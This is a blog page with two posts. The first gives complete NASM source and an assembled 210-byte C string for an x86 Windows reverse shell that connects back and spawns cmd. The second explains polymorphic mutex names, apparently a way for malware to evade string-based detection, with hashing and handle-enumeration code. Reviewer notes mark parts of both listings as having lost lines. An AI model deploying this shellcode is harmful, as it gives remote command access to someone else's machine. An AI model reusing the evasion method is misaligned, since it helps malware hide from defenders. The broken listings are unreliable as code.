Shellcode: A Tweetable Reverse Shell for x86 Windows


Since being granted a 280 character limit, many twitter users have been embedding all kinds of code into a single message. This will be a quick post showing a tweetable reverse shell for x86 windows. You’ll have to forgive me for writing about boring shellcodes again, I have nothing else to write about 😛

Payload generators seem unable to produce a reverse shell equal to or less than 210 bytes which is required before conversion to base64. The code here has been written mostly from scratch, but obviously not without influence from existing shellcodes that featured nice ideas.

There are 3 in particular I took ideas from. Not all of the code is entirely necessary, but I wanted the final code to be somewhat stable. In the end, I had to remove code to gracefully exit, so once the cmd process ends, it takes the host process with it…

Moreover, this code is unlikely to run smoothly on all versions of Windows due to elimination of code that would make it work. If you can optimize it further, I’m sure you can get it to work on all versions of windows.

Recycling ideas

The following codes were useful for writing the tweetable version.

Year Author Description
2007 weiss Traverses the PEB DLL list, and initializes all parameters before calling API, the latter of which seems to be inspired by rgb/29a viruses.
2008 weiss A function to resolve and invoke an API is kept separate from all other code. It jumps directly to the API address once found and then returns to the caller.
2009 Stephen Fewer Provides additional hashing of DLL name from PEB

Here’s the source code which can be assembled using YASM or NASM.

; 210 byte reverse shell for x86 windows
; odzhan
    bits   32

; Offsets of the eight general-purpose registers as PUSHAD leaves them on
; the stack, lowest address first (EDI is pushed last, EAX first).
; The dispatcher uses [esp+_eax] to read and overwrite the saved EAX slot.
; NOTE(review): no closing `endstruc` is visible in this listing - confirm
; against the original source before assembling.
struc pushad_t
  _edi resd 1
  _esi resd 1
  _ebp resd 1
  _esp resd 1
  _ebx resd 1
  _edx resd 1
  _ecx resd 1
  _eax resd 1

      ; Entry point followed by an inline data table.
      ; EAX is cleared first (AL is later the fill byte for `rep stosb`).
      ; CALL pushes the address of the table as its return address; the
      ; main routine pops that address to locate the hashes and parameters.
      ; Each hash is consumed in order, one per `call ebp`.
      bits   32

      xor    eax, eax
      call   init_api_disp  ; load the API dispatcher
      dd     0xDF6D65D1     ; WS2_32.dll   + WSASocketA
      db     'cmd',0h       ; command line handed to CreateProcessA
      dd     0D2040002h     ; sa.sin_family = AF_INET (2), sa.sin_port = htons(1234)
      dd     00100007Fh     ; sa.sin_addr = inet_addr("127.0.0.1")
      dd     0xA324AC0C     ; WS2_32.dll   + connect
      dd     0x611AD39B     ; KERNEL32.dll + CreateProcessA
      dd     0x607F058C     ; KERNEL32.dll + WaitForSingleObject
      ;dd     0x467EDD8B     ; ntdll.dll    + RtlExitUserThread
      ; API dispatcher: resolve the next hash in the table and jump to the API.
      ; In:   esi = address of the next 32-bit hash; API arguments already
      ;       pushed by the caller.
      ; Out:  control transfers to the API, which returns to the caller.
      ;       esi stays advanced by 4 (PUSHAD runs after LODSD).
      ; Hash: sum of ROTL13 hashes of the export directory's DLL name and
      ;       the export name.
      ; NOTE(review): the jump targets get_dll, next_dll, hash_dll, get_name
      ; and hash_name have no label lines in this listing. The byte listing
      ; later in the file also shows `cdq`/`lodsb` inside both hash loops and
      ; `lodsd` before each export-directory field is used. Those lines
      ; appear to have been lost here - confirm against the original source.
      lodsd                 ; eax = hash to find
      pushad                ; saves api hash on stack
      xor    eax, eax
      mov    eax, [fs:eax+30h]  ; eax = (PPEB) __readfsdword(0x30);
      mov    eax, [eax+0ch] ; eax = (PPEB_LDR_DATA)peb->Ldr
      mov    edi, [eax+0ch] ; edi = ldr->InLoadOrderModuleList.Flink
      jmp    get_dll
      mov    edi, [edi]     ; edi = dte->InLoadOrderLinks.Flink
      mov    ebx, [edi+18h] ; ebx = dte->DllBase
      ; eax = IMAGE_DOS_HEADER.e_lfanew
      mov    eax, [ebx+3ch]
      ; ecx = IMAGE_DATA_DIRECTORY.VirtualAddress
      mov    ecx, [ebx+eax+78h]
      jecxz  next_dll       ; module has no export directory
      ; esi = hash_dll(IMAGE_EXPORT_DIRECTORY.Name)
      mov    esi, [ebx+ecx+0ch]
      add    esi, ebx
      xor    eax, eax
      add    edx, eax ;  h += *s++
      rol    edx, 13  ;  h = ROTL32(h, 13) 
      dec    eax      ;  0 - 1 sets SF, so the loop ends after the NUL byte
      jns    hash_dll
      mov    ebp, edx ;  ebp = hash of DLL name
      ; esi = offset IMAGE_EXPORT_DIRECTORY.NumberOfNames 
      lea    esi, [ebx+ecx+18h]
      xchg   eax, ecx
      jecxz  next_dll        ; skip if no names
      push   edi             ; save edi
      ; save IMAGE_EXPORT_DIRECTORY.AddressOfFunctions     
      add    eax, ebx        ; eax = RVA2VA(eax, ebx)
      push   eax             ; save address of functions
      ; edi = IMAGE_EXPORT_DIRECTORY.AddressOfNames
      add    eax, ebx        ; eax = RVA2VA(eax, ebx)
      xchg   eax, edi        ; swap(eax, edi)
      ; save IMAGE_EXPORT_DIRECTORY.AddressOfNameOrdinals
      add    eax, ebx        ; eax = RVA2VA(eax, ebx)
      push   eax             ; save address of name ordinals
      mov    esi, [edi+4*ecx-4] ; esi = RVA of API string (names walked last to first)
      add    esi, ebx           ; esi = RVA2VA(esi, ebx)
      xor    eax, eax           ; zero eax
      cdq                       ; h = 0
      add    edx, eax           ; h += *s++
      rol    edx, 13            ; h = ROTL32(h, 13)
      dec    eax                ; stop once the NUL byte has been hashed
      jns    hash_name
      add    edx, ebp           ; add hash of DLL string  
      ; +12 skips the three dwords pushed above to reach the PUSHAD frame
      cmp    edx, [esp+_eax+12] ; hashes match?
      loopne get_name           ; --ecx && edx != hash
      ; POP does not modify flags, so ZF from the CMP is still valid at JNE
      pop    edx                ; edx = AddressOfNameOrdinals
      pop    esi                ; esi = AddressOfFunctions
      pop    edi                ; restore DLL entry
      jne    next_dll           ; get next DLL        
      movzx  eax, word [edx+2*ecx] ; eax = AddressOfNameOrdinals[ecx]
      add    ebx, [esi+4*eax] ; ebx = base + AddressOfFunctions[eax]
      mov    [esp+_eax], ebx  ; patch saved EAX so POPAD loads the API address
      popad                        ; restore all
      jmp    eax                   ; jmp to api address
      ; Main routine, reached through the CALL at the entry point.
      ; esi walks the inline table; ebp holds the dispatcher address, so
      ; every `call ebp` resolves and invokes the next API in table order.
      ; NOTE(review): the label for this routine is not visible in this
      ; listing. The byte listing later in the file also contains
      ; instructions missing here: `cdq` before the CreateProcessA pushes,
      ; a `lodsd` before `push 10h`, and a second `lodsd` before connect.
      ; Confirm against the original source.
      pop    esi                   ; esi = api parameters
      lea    ebp, [esi+(api_disp - api_hash)] ; ebp = address of the dispatcher
      ; edi = alloc(124);    
      push   124
      pop    ecx
      sub    esp, ecx              ; reserve 124 bytes of stack
      mov    edi, esp
      rep    stosb                 ; zero-fill (AL is 0 from the entry point)

      ; WSASocketA takes six arguments but only two are pushed; the other
      ; four are read from the zero-filled area directly above them.
      push   1                     ; type = SOCK_STREAM
      push   2                     ; af = AF_INET
      call   ebp                   ; WSASocketA, eax = s

      ; CreateProcess(NULL, "cmd", NULL, NULL, 
      ;   TRUE, 0, NULL, NULL, &si, &pi);
      mov    ebx, esp       ; ebx = &si
      lea    edi, [ebx+38h] ; edi = &si.hStdInput
      ; dwFlags is at offset 2Ch; incrementing the dword at 2Dh adds 100h
      ; to it, which is STARTF_USESTDHANDLES.
      inc    dword[ebx+2dh] ; si.dwFlags = STARTF_USESTDHANDLES
      stosd                 ; si.hStdInput  = s;
      stosd                 ; si.hStdOutput = s;
      stosd                 ; si.hStdError  = s;
      ; edi is now ebx+44h, the first byte after the 44h-byte STARTUPINFO
      push   edi            ; lpProcessInformation = &pi
      push   ebx            ; lpStartupInfo = &si      
      push   edx            ; lpCurrentDirectory = NULL
      push   edx            ; lpEnvironment = NULL
      push   edx            ; dwCreationFlags = 0
      push   eax            ; bInheritHandles = TRUE (the non-zero socket handle)
      push   edx            ; lpThreadAttributes = NULL
      push   edx            ; lpProcessAttributes = NULL
      push   esi            ; lpCommandLine = "cmd", 0
      push   edx            ; lpApplicationName = NULL
      xchg   ebx, eax       ; ebx = s
      ; connect(s, &sa, sizeof(sa));
      ; These arguments sit on top of the CreateProcessA frame pushed above,
      ; so the two calls below consume the frames in order.
      push   10h            ; sizeof(sa)
      push   esi            ; &sa
      push   ebx            ; s
      lodsd                 ; skip &sa
      call   ebp            ; connect
      call   ebp            ; CreateProcessA

      ; WaitForSingleObject(pi.hProcess, INFINITE);
      push   -1             ; INFINITE
      push   dword [edi]    ; pi.hProcess (first field of PROCESS_INFORMATION)
      call   ebp   
      ; RtlExitUserThread();
      ; call   ebp

Here’s the assembled code as a C string… don’t forget it connects to 127.0.0.1 on port 1234.

#define RS2_SIZE 210

char RS2[] = {
  /* 0000 */ "\x31\xc0"                 /* xor eax, eax                */
  /* 0002 */ "\xe8\x90\x00\x00\x00"     /* call 0x97                   */
  /* 0007 */ "\xd1\x65\x6d"             /* shl dword [ebp+0x6d], 1     */
  /* 000A */ "\xdf\x63\x6d"             /* fbld tword [ebx+0x6d]       */
  /* 000D */ "\x64\x00\x02"             /* add [fs:edx], al            */
  /* 0010 */ "\x00\x04\xd2"             /* add [edx+edx*8], al         */
  /* 0013 */ "\x7f\x00"                 /* jg 0x15                     */
  /* 0015 */ "\x00\x01"                 /* add [ecx], al               */
  /* 0017 */ "\x0c\xac"                 /* or al, 0xac                 */
  /* 0019 */ "\x24\xa3"                 /* and al, 0xa3                */
  /* 001B */ "\x9b"                     /* wait                        */
  /* 001C */ "\xd3\x1a"                 /* rcr dword [edx], cl         */
  /* 001E */ "\x61"                     /* popad                       */
  /* 001F */ "\x8c\x05\x7f\x60\xad\x60" /* mov [0x60ad607f], es        */
  /* 0025 */ "\x31\xc0"                 /* xor eax, eax                */
  /* 0027 */ "\x64\x8b\x40\x30"         /* mov eax, [fs:eax+0x30]      */
  /* 002B */ "\x8b\x40\x0c"             /* mov eax, [eax+0xc]          */
  /* 002E */ "\x8b\x78\x0c"             /* mov edi, [eax+0xc]          */
  /* 0031 */ "\xeb\x02"                 /* jmp 0x35                    */
  /* 0033 */ "\x8b\x3f"                 /* mov edi, [edi]              */
  /* 0035 */ "\x8b\x5f\x18"             /* mov ebx, [edi+0x18]         */
  /* 0038 */ "\x8b\x43\x3c"             /* mov eax, [ebx+0x3c]         */
  /* 003B */ "\x8b\x4c\x03\x78"         /* mov ecx, [ebx+eax+0x78]     */
  /* 003F */ "\xe3\xf2"                 /* jecxz 0x33                  */
  /* 0041 */ "\x8b\x74\x0b\x0c"         /* mov esi, [ebx+ecx+0xc]      */
  /* 0045 */ "\x01\xde"                 /* add esi, ebx                */
  /* 0047 */ "\x31\xc0"                 /* xor eax, eax                */
  /* 0049 */ "\x99"                     /* cdq                         */
  /* 004A */ "\xac"                     /* lodsb                       */
  /* 004B */ "\x01\xc2"                 /* add edx, eax                */
  /* 004D */ "\xc1\xc2\x0d"             /* rol edx, 0xd                */
  /* 0050 */ "\x48"                     /* dec eax                     */
  /* 0051 */ "\x79\xf7"                 /* jns 0x4a                    */
  /* 0053 */ "\x89\xd5"                 /* mov ebp, edx                */
  /* 0055 */ "\x8d\x74\x0b\x18"         /* lea esi, [ebx+ecx+0x18]     */
  /* 0059 */ "\xad"                     /* lodsd                       */
  /* 005A */ "\x91"                     /* xchg ecx, eax               */
  /* 005B */ "\xe3\xd6"                 /* jecxz 0x33                  */
  /* 005D */ "\x57"                     /* push edi                    */
  /* 005E */ "\xad"                     /* lodsd                       */
  /* 005F */ "\x01\xd8"                 /* add eax, ebx                */
  /* 0061 */ "\x50"                     /* push eax                    */
  /* 0062 */ "\xad"                     /* lodsd                       */
  /* 0063 */ "\x01\xd8"                 /* add eax, ebx                */
  /* 0065 */ "\x97"                     /* xchg edi, eax               */
  /* 0066 */ "\xad"                     /* lodsd                       */
  /* 0067 */ "\x01\xd8"                 /* add eax, ebx                */
  /* 0069 */ "\x50"                     /* push eax                    */
  /* 006A */ "\x8b\x74\x8f\xfc"         /* mov esi, [edi+ecx*4-0x4]    */
  /* 006E */ "\x01\xde"                 /* add esi, ebx                */
  /* 0070 */ "\x31\xc0"                 /* xor eax, eax                */
  /* 0072 */ "\x99"                     /* cdq                         */
  /* 0073 */ "\xac"                     /* lodsb                       */
  /* 0074 */ "\x01\xc2"                 /* add edx, eax                */
  /* 0076 */ "\xc1\xc2\x0d"             /* rol edx, 0xd                */
  /* 0079 */ "\x48"                     /* dec eax                     */
  /* 007A */ "\x79\xf7"                 /* jns 0x73                    */
  /* 007C */ "\x01\xea"                 /* add edx, ebp                */
  /* 007E */ "\x3b\x54\x24\x28"         /* cmp edx, [esp+0x28]         */
  /* 0082 */ "\xe0\xe6"                 /* loopne 0x6a                 */
  /* 0084 */ "\x5a"                     /* pop edx                     */
  /* 0085 */ "\x5e"                     /* pop esi                     */
  /* 0086 */ "\x5f"                     /* pop edi                     */
  /* 0087 */ "\x75\xaa"                 /* jnz 0x33                    */
  /* 0089 */ "\x0f\xb7\x04\x4a"         /* movzx eax, word [edx+ecx*2] */
  /* 008D */ "\x03\x1c\x86"             /* add ebx, [esi+eax*4]        */
  /* 0090 */ "\x89\x5c\x24\x1c"         /* mov [esp+0x1c], ebx         */
  /* 0094 */ "\x61"                     /* popad                       */
  /* 0095 */ "\xff\xe0"                 /* jmp eax                     */
  /* 0097 */ "\x5e"                     /* pop esi                     */
  /* 0098 */ "\x8d\x6e\x1c"             /* lea ebp, [esi+0x1c]         */
  /* 009B */ "\x6a\x7c"                 /* push 0x7c                   */
  /* 009D */ "\x59"                     /* pop ecx                     */
  /* 009E */ "\x29\xcc"                 /* sub esp, ecx                */
  /* 00A0 */ "\x89\xe7"                 /* mov edi, esp                */
  /* 00A2 */ "\xf3\xaa"                 /* rep stosb                   */
  /* 00A4 */ "\x6a\x01"                 /* push 0x1                    */
  /* 00A6 */ "\x6a\x02"                 /* push 0x2                    */
  /* 00A8 */ "\xff\xd5"                 /* call ebp                    */
  /* 00AA */ "\x89\xe3"                 /* mov ebx, esp                */
  /* 00AC */ "\x8d\x7b\x38"             /* lea edi, [ebx+0x38]         */
  /* 00AF */ "\xff\x43\x2d"             /* inc dword [ebx+0x2d]        */
  /* 00B2 */ "\xab"                     /* stosd                       */
  /* 00B3 */ "\xab"                     /* stosd                       */
  /* 00B4 */ "\xab"                     /* stosd                       */
  /* 00B5 */ "\x99"                     /* cdq                         */
  /* 00B6 */ "\x57"                     /* push edi                    */
  /* 00B7 */ "\x53"                     /* push ebx                    */
  /* 00B8 */ "\x52"                     /* push edx                    */
  /* 00B9 */ "\x52"                     /* push edx                    */
  /* 00BA */ "\x52"                     /* push edx                    */
  /* 00BB */ "\x50"                     /* push eax                    */
  /* 00BC */ "\x52"                     /* push edx                    */
  /* 00BD */ "\x52"                     /* push edx                    */
  /* 00BE */ "\x56"                     /* push esi                    */
  /* 00BF */ "\x52"                     /* push edx                    */
  /* 00C0 */ "\x93"                     /* xchg ebx, eax               */
  /* 00C1 */ "\xad"                     /* lodsd                       */
  /* 00C2 */ "\x6a\x10"                 /* push 0x10                   */
  /* 00C4 */ "\x56"                     /* push esi                    */
  /* 00C5 */ "\x53"                     /* push ebx                    */
  /* 00C6 */ "\xad"                     /* lodsd                       */
  /* 00C7 */ "\xad"                     /* lodsd                       */
  /* 00C8 */ "\xff\xd5"                 /* call ebp                    */
  /* 00CA */ "\xff\xd5"                 /* call ebp                    */
  /* 00CC */ "\x6a\xff"                 /* push 0xffffffff             */
  /* 00CE */ "\xff\x37"                 /* push dword [edi]            */
  /* 00D0 */ "\xff\xd5"                 /* call ebp                    */


It was tested in a 32-bit process (Wow64) running on 64-bit versions of Windows 7 and 10. It’s unlikely to run on Windows NT. I’m already aware of all the potential problems running this code, so save your breath my friend 🙂 It was written for fun, and nothing more.

View source here

Posted in assembly, programming, security, shellcode, windows | Tagged , , , , , | Leave a comment

Polymorphic Mutex Names


Perhaps there was never any legitimate reason to use Polymorphic Mutex Names, so it’s understandable many developers never provided a solution.

It could be argued, poly mutexes serve only as a way for malicious applications to evade detection. On the other hand, they could potentially be used to defend applications from Denial of Service (DoS) attacks or termination by a malicious application.

Many developers use named mutexes to avoid multiple instances of their application running. The problem is that applications using this technique are also vulnerable to Denial of Service attacks.

First, some definitions…

Named Mutex

A mutual exclusion (mutex) is a program object that allows multiple program threads to share the same resource, but not simultaneously. Global Named Mutexes can be created to avoid multiple instances of the same application running on a system.

How to limit 32-bit applications to one instance in Visual C++ explains how to do this.

The following snippet of code is very common.

// Common single-instance pattern: create a named mutex at startup and exit
// if GetLastError() reports that a mutex with that name already exists.
// The name is a fixed string, so any other process that creates a mutex
// called "com_mycompany_apps_appname" first makes this program exit.
int WINAPI WinMain(...)
   const char szUniqueNamedMutex[] = "com_mycompany_apps_appname";
   HANDLE hHandle = CreateMutex( NULL, TRUE, szUniqueNamedMutex );
   if( ERROR_ALREADY_EXISTS == GetLastError() )
      // Program already running somewhere
      return(1); // Exit program

   // Program runs...

   // Upon app closing:
   ReleaseMutex( hHandle ); // Explicitly release mutex
   CloseHandle( hHandle ); // close handle before terminating
   return( 1 );

The problem with this example is when an entirely different application either intentionally or unintentionally creates a mutex of the same name. In this case: com_mycompany_apps_appname

In the remarks section for the CreateMutex API, it states the following.

If you are using a named mutex to limit your application to a single instance, a malicious user can create this mutex before you do and prevent your application from starting. To prevent this situation, create a randomly named mutex and store the name so that it can only be obtained by an authorized user. Alternatively, you can use a file for this purpose. To limit your application to one instance per user, create a locked file in the user’s profile directory.

Raymond Chen covers the topic in A single-instance program is its own denial of service

A discussion on stack exchange and another in Multiple program instance prevention in C suggest possible ways to avoid Denial of Service conditions.

Polymorphic Code

Uses a Disassembly Engine (DE) to rewrite instructions while retaining the original algorithm. The code changes itself each time it runs, but functionality of the code will remain the same.

Imagine setting the EAX register of an x86 CPU to zero. Each of the following instruction sequences accomplishes this, but they certainly appear different, don’t they?

"\x31\xc0"                 /* xor  eax, eax             */

"\x29\xc0"                 /* sub  eax, eax             */

"\xb8\x00\x00\x00\x00"     /* mov  eax, 0               */

"\x8d\x05\x00\x00\x00\x00" /* lea  eax, [0]             */

"\x83\xe0\x00"             /* and  eax, 0               */

"\x6a\x00"                 /* push 0                    */
"\x58"                     /* pop  eax                  */

"\x6b\xc0\x00"             /* imul eax, eax, 0          */

Malware Evasion Techniques

It was a blog post by the Talos Group titled “Cyber Conflict” Decoy Document Used In Real Cyber Conflict which reminded me of how malware continues to use named mutexes to prevent multiple instances of the same code running simultaneously.

This malware in particular decodes a mutex name at runtime in order to evade detection by string. Here you see the mutex name in its decoded state. That is, after it’s been deobfuscated using an XOR operation.

Talos go on to say: the actor changed the XOR key and the MUTEX name. We assume that these modifications were performed in order to avoid detection based on public IOCs.

An Indicator of Compromise (IOC) is an artifact that can be used to identify an attack, such as a mutex name.

@osxreverser joked about the concept of polymorphic mutex names back in July. Since a polymorphic mutex name would always be different, the assumption is that it would be ineffective as a way to prevent multiple instances running.

Are polymorphic mutex names possible? Yes, they are.
Do they have a legitimate purpose? Potentially, yes.

Some searching online led me to the following question on Stack Overflow, which was posted in 2012.

Can a polymorphic/metamorphic worm use (the same) mutex? This would solve the problem of grinding the network into the ground and consuming all resources with multiple instances of the worm….

The answer which was accepted:

Short answer: no.

The point of polymorphic malware is to have no identifiable pattern. …. To know the name of the mutex, there must be a pattern to it. If there’s a pattern to it, the AV can use that pattern to detect the malware.

However, this answer is not entirely true…

The general consensus is that poly mutex names aren’t possible.

A proposal to generate Mutex Revocation List (MRL) is discussed in What if we had mutex revocation lists?

As the malware authors use these markers to check if they have already infected a specific machine, the mutex names can’t be truly random.

No, they can’t be truly random, but they can be more difficult to detect.

Using encryption

To the best of my knowledge, the first documented example of malware using encryption algorithms to derive mutex names was demonstrated in the TreasureHunter malware.

How Malware Generates Mutex Names to Evade Detection discusses how the TreasureHunter malware derives an MD5 hash of the Windows Product ID before using this as the global mutex name. This prevents more than one instance of the application running while simultaneously evading detection via string matching.

Loki-Bot does something similar using the MachineGUID from the Windows registry.

For more information, see Looking at Mutex Objects for Malware Discovery and Indicators of Compromise

Although the above methods don’t generate polymorphic names, only entropy and additional code to enumerate mutexes are missing.

So what kinds of crypto can be used to generate poly mutex names?

  • Key derivation function (KDF)
  • Use a password hashing algorithm along with nonce to create unique output.

  • Symmetric Encryption
  • Use a stream or block cipher with unique key to encrypt a message, can later be decrypted using same key.

  • Message Authentication Code (MAC)
  • Use a cryptographic primitive and unique key to derive hash of string. Hash can be verified using same message and key.

  • Pseudo Random Number Generator (PRNG)
  • Seed RNG using hash of unique information obtained from operating system.
    Use byte stream to obfuscate a message.

  • Asymmetric Encryption
  • Use a digital signature algorithm such as ElGamal or DSA.

Although all of the above can be used or misused to generate polymorphic mutex names, using a KDF seemed sufficient.

If we use entropy, this must be included in the name, otherwise we cannot verify ownership of the named object later when performing detection.

You can think of the mutex name as being a password if we use a KDF, and a nonce/salt being the entropy.

Mutex Name Generation

For illustration purposes, I’m using the permutation function of SipHash for a 64-bit hash function.

// Mixes the 128-bit state in place, viewed as four 32-bit words s[0..3].
// Each round uses only additions, left-rotations (by 5, 8 and 7) and XORs.
//   state : state to permute; modified in place
//   cnt   : number of rounds to apply
// NOTE(review): the closing braces of the loop and the function are not
// visible in this listing.
void permute(w128_t *state, int cnt) {
  uint32_t *s=(uint32_t*)&state->w[0];
  int      i;
  for (i=0; i<cnt; i++) {
    s[0] += s[1]; 
    s[1]=ROTL32(s[1], 5); 
    s[1] ^= s[0]; 
    s[2] += s[3]; 
    s[3]=ROTL32(s[3], 8); 
    s[3] ^= s[2]; 
    s[0] += s[3]; 
    s[3] ^= s[0]; 
    s[2] += s[1]; 
    s[1]=ROTL32(s[1], 7); 
    s[1] ^= s[2]; 
// Derives a 64-bit hash of `in` under a 64-bit nonce.
//   in    : input bytes
//   len   : number of input bytes
//   nonce : 64-bit seed, passed by value; its two 32-bit halves are
//           written to state words 1 and 3
// Returns the first 64 bits of the state after the final permutation.
// NOTE(review): the braces of the function body and of the while/for loops
// are not visible in this listing.
uint64_t Hexe(void *in, size_t len, uint64_t nonce)
    w128_t s;
    int    idx, i;
    uint8_t *p=(uint8_t*)in;
    w64_t   *seed=(w64_t*)&nonce;
    // zero initialize
    memset(s.b, 0, sizeof(s));

    // set 64-bit seed
    s.w[1] = seed->w[0];
    s.w[3] = seed->w[1];
    // absorb data
    // XOR up to HEXE_BLOCK_LEN bytes into the state, then run two rounds
    while (len) {
      idx = MIN(len, HEXE_BLOCK_LEN);
      for (i=0; i<idx; i++) {
        s.b[i] ^= p[i];
      p += idx;
      len -= idx;
      permute(&s, 2);
    // add padding
    // NOTE(review): idx is only assigned inside the loop above, so it is
    // uninitialized here when len == 0. When the final block is full, idx
    // equals HEXE_BLOCK_LEN - confirm that is a valid index into s.b.
    s.b[idx] ^= 0x1F;
    s.b[3]   ^= 0x80;
    // permute last time
    permute(&s, 4);
    // return 64-bit hash
    return s.q[0];

The 1st 32-bits highlighted in red are the nonce/seed value provided to Hexe with mutex name. The remaining 64-bits are returned by Hexe.

Validation is simply using the same mutex name and nonce/seed value to derive a hash which is then compared with the mutex name enumerated from system.

Additional steps

Since a lot of unique mutex names are derived from a GUID function such as CoCreateGUID() we can take things a step further and increase the length of nonce to 64-bits. This along with 64-bit hash can be converted to a GUID string.

int main(int argc, char *argv[])
    w128_t  s, r;
    OLECHAR *guid_str;
    if (argc!=2) {
      printf ("usage: hexe_hash <string>\n");
      return 0;
    // doesn't matter about source of seed value
    // just multiply using golden ratio value
    s.w[0] = rand() * 0x9e3779b9;
    s.w[1] = rand() * 0x9e3779b9;
    // derive hash of input string
    s.q[1] = Hexe(argv[1], strlen(argv[1]), &s);
    wprintf(L"Hexe Hash : %016llX%016llX\n", s.q[0], s.q[1]);
    // convert to string
    StringFromCLSID((GUID*)&s, &guid_str);
    wprintf(L"GUID      : %s\n", guid_str);
    // convert to binary
    CLSIDFromString(guid_str, (GUID*)&r);
    wprintf(L"Hexe Hash : %016llX%016llX\n", r.q[0], r.q[1]);
    return 0;  

As you can see, it looks exactly like a regular GUID now except it can also be verified using the same algorithm that generated it.

All that remains now is how to find and validate poly mutex names.

Enumerating Mutexes

We enumerate handles (file descriptors on linux) for each process of the local computer. Keep only handles of type Mutant, discard those with no name, then attempt verification of each remaining name.

// Scans the system-wide handle list for a named Mutant object whose name
// parses as a GUID of the form {nonce, Hexe(mutex_name, nonce)}.
//   mutex_name : wide-character base name that the hash is derived from
// Returns TRUE if such an object is found. Returns FALSE if none is found,
// if the ntdll entry points cannot be resolved, or if the handle query fails.
// NOTE(review): this listing has lost braces and parts of several
// statements. The variables h, obi, t and n are used but their declarations
// are not visible. Treat this as an outline and check the original source.
BOOL IsRunning(PWCHAR mutex_name)
    pNtQuerySystemInformation  NtQuerySystemInformation;
    pNtQueryObject             NtQueryObject;

    w128_t                     r;
    PWCHAR                     p;
    HRESULT                    hr;
    ULONGLONG                  hash;
    ULONG                      len=0, total=0;
    NTSTATUS                   status;
    LPVOID                     list=NULL;
    DWORD                      i;
    HANDLE                     hProcess, hObject;

    BOOL                       bRunning=FALSE;
    size_t                     mutex_len;

    // NOTE(review): both assignments below have unbalanced parentheses;
    // presumably a cast and a GetProcAddress( call were lost - confirm.
    NtQuerySystemInformation =
        GetModuleHandle(L"ntdll"), "NtQuerySystemInformation");

    NtQueryObject =
        GetModuleHandle(L"ntdll"), "NtQueryObject");

    if (!NtQuerySystemInformation ||
        !NtQueryObject) {
      // we couldn't resolve API address
      return FALSE;

    SetPrivilege(SE_DEBUG_NAME, TRUE);

    list = xmalloc(2048);

    // grow the buffer by 2048 bytes per attempt until the query no longer
    // reports STATUS_INFO_LEN_MISMATCH
    do {
      len += 2048;
      list = xrealloc (list, len);

      if (list==NULL) {
        // we couldn't reallocate memory
      status = NtQuerySystemInformation(SystemHandleInformation,
          list, len, &total);

    } while (status == STATUS_INFO_LEN_MISMATCH);

    if (!NT_SUCCESS(status)) {
      // we were unable to obtain list of process
      return FALSE;

    // length in characters; doubled below to get the byte count for Hexe
    mutex_len = lstrlen(mutex_name);

    // for each handle
    // the loop stops at the first match because of the !bRunning condition
    for (i=0; i<h->HandleCount && !bRunning; i++)
      // skip system
      if (h->Handles[i].ProcessId == 4) continue;

      // open the process
      hProcess = OpenProcess(PROCESS_DUP_HANDLE,
         FALSE, h->Handles[i].ProcessId);

      if (hProcess != NULL)
        // try duplicate handle
        // DuplicateHandle returns a BOOL; it is stored in the NTSTATUS
        // variable and tested for non-zero below
        status = DuplicateHandle(hProcess,
            (HANDLE)h->Handles[i].Handle, GetCurrentProcess(),
            &hObject, 0, FALSE, DUPLICATE_SAME_ACCESS);

        if (status)
          // query basic info
          status = NtQueryObject(hObject,
              ObjectBasicInformation, &obi, sizeof(obi), &len);

          if (NT_SUCCESS(status))
            // skip object if there's no name
            if (obi.NameInformationLength !=0)
              // query the type
              // the +2 is presumably room for a terminating wide NUL - confirm
              len = obi.TypeInformationLength + 2;
              t = (POBJECT_TYPE_INFORMATION)xmalloc(len);

              if (t != NULL) {
                status = NtQueryObject(hObject,
                    ObjectTypeInformation, t, len, &len);

                if (NT_SUCCESS(status)) {
                  // skip object if it isn't a mutant
                  if (lstrcmpi(t->Name.Buffer, L"Mutant")!=0) {

              // query the name
              len = obi.NameInformationLength + 2;
              n = (POBJECT_NAME_INFORMATION)xmalloc(len);

              if (n != NULL) {
                status = NtQueryObject(hObject,
                    ObjectNameInformation, n, len, &len);

                if (NT_SUCCESS(status)) {
                  // obtain the absolute name
                  // i.e. the component after the last backslash of the path
                  p = wcsrchr(n->Name.Buffer, L'\\');
                  if (p != NULL) {
                    p += 1;
                    // attempt conversion to binary
                    // NOTE(review): the second argument is cut off here;
                    // presumably (GUID*)&r, since r.q[] is read below
                    hr = CLSIDFromString((OLECHAR*)p, 
                    if (hr == NOERROR) {
                      // generate hash using seed
                      // r.q[0] is the nonce taken from the candidate name
                   hash = Hexe(mutex_name, 
                       mutex_len*2, r.q[0]);
                      // do we have a match?
                      if (hash == r.q[1]) {
                        // we found poly mutex
          // close object
        // close process
    // NOTE(review): no CloseHandle calls and no release of t, n or list
    // are visible in this listing - confirm they exist in the original.
    return bRunning;

An example of output from handle.c


    PWCHAR  mutex_name = L"com_mycompany_apps_appname";
    BOOL    bRunning; 
    w128_t  s, r;
    OLECHAR *guid_str;
    HANDLE  hMutex;
    // already running?
    bRunning = IsRunning(mutex_name); 
    wprintf (L"Checking: %s : %s.\n", mutex_name,
      bRunning ? L"Found instance" : L"Instance not found");
    // if not running, create it
    // doesn't matter about source of seed value
    // just multiply using golden ratio value
    s.w[0] = rand() * 0x9e3779b9;
    s.w[1] = rand() * 0x9e3779b9;
    // derive hash of input string
    s.q[1] = Hexe(mutex_name, lstrlen(mutex_name)*2, s.q[0]);
    // convert to string
    StringFromCLSID((GUID*)&s, &guid_str);
    wprintf(L"Creating: %s for %s\n", guid_str, mutex_name);
    // create
    hMutex = CreateMutex(NULL, TRUE, guid_str);
    if (ERROR_ALREADY_EXISTS == GetLastError()) {
      wprintf (L"already exists!\n");
      return 0;
    // already running?
    bRunning = IsRunning(mutex_name); 
    wprintf (L"Checking: %s : %s.\n", mutex_name,
      bRunning ? L"Found instance" : L"Instance not found");
    // close mutex 
    wprintf (L"Closing : %s\n", mutex_name);

    // already running?
    bRunning = IsRunning(mutex_name); 
    wprintf (L"Checking: %s : %s.\n", mutex_name,
      bRunning ? L"Found instance" : L"Instance not found");

Although the above example uses a hardcoded string, the MachineGUID value could also be used.


While something like this can be used for malicious purposes, defensive applications need to evade detection too.

Ideally, generation of mutex names should be created by the kernel using digital signatures, but since there is no demand for such a feature, we’re unlikely to see it implemented.

@yassine_lemmou pointed out to me that if 2 or more applications run at the same time, this would result in multiple instances running.


Posted in cryptography, programming, windows | Tagged , , , , | Leave a comment

Shellcode: Linux ARM (AArch64)


